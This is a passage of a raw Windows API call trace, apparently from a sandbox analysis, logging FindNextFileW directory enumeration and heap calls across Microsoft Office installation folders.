lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0158.958] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4579fa8, Size=0x4000) returned 0x4591fc0 [0158.963] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4591fc0, Size=0x8000) returned 0x4591fc0 [0158.976] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4591fc0, Size=0x10000) returned 0x4544fe8 [0159.003] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4544fe8, Size=0x20000) returned 0x45aefd0 [0159.271] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x45aefd0, Size=0x40000) returned 0x45cf6e0 [0159.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0159.282] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0159.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0159.286] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 0 [0159.286] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0159.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0159.286] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0159.286] FindClose (in: hFindFile=0x728388 | out: hFindFile=0x728388) returned 1 [0159.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0159.294] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Document Themes 16", cAlternateFileName="DOCUME~1")) returned 1 [0160.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0160.087] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Effects", cAlternateFileName="THEMEE~1")) returned 1 [0160.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0160.308] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Fonts", cAlternateFileName="THEMEF~1")) returned 1 [0160.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0160.311] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc7c1, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Wisp.thmx", cAlternateFileName="WISP~1.THM")) returned 1 [0160.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0160.311] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114f5747, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Flattener", cAlternateFileName="FLATTE~1")) returned 1 [0160.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0160.315] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fre", cAlternateFileName="")) returned 1 [0160.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0160.318] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2abe77, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0160.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0160.323] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee308135, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Licenses16", cAlternateFileName="LICENS~1")) returned 1 [0160.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0160.868] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee45f66d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x983c2c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="loc", cAlternateFileName="")) returned 1 [0161.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0161.140] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mcxml", cAlternateFileName="")) returned 1 [0161.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.148] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0161.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.151] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99473dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0161.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.152] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 1 [0161.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.158] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 0 [0161.158] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0161.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0161.158] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office16", cAlternateFileName="")) returned 1 [0161.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0161.496] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a96a42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a96a42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xde78, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BSTORM.VSL", cAlternateFileName="")) returned 1 [0161.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0161.712] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45a7036, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45a7036, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4619706, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBSAMPLE.MDB", cAlternateFileName="")) returned 1 [0161.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0161.881] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBSPAPR", cAlternateFileName="")) returned 1 [0162.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0162.016] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc79af6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc79af6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7c11d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fc48, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBWZINT.DLL", cAlternateFileName="")) returned 1 [0162.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0162.257] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ReviewRouting_Init.xsn", cAlternateFileName="REVIEW~1.XSN")) returned 1 [0162.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0162.260] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0162.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0162.260] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0162.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0162.260] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AccessWeb", cAlternateFileName="ACCESS~1")) returned 1 [0162.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0162.260] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1306082b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x393a40, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCICONS.EXE", cAlternateFileName="")) returned 1 [0162.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0162.262] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33860, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCWIZ.DLL", cAlternateFileName="")) returned 1 [0162.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0162.267] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0162.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0162.269] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0162.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0162.271] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0162.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0162.461] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0162.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0162.718] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0162.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0162.902] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4fe050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DocumentFormat.OpenXml.dll", cAlternateFileName="DOCUME~1.DLL")) returned 1 [0163.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.134] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0163.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.419] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0163.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.420] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, 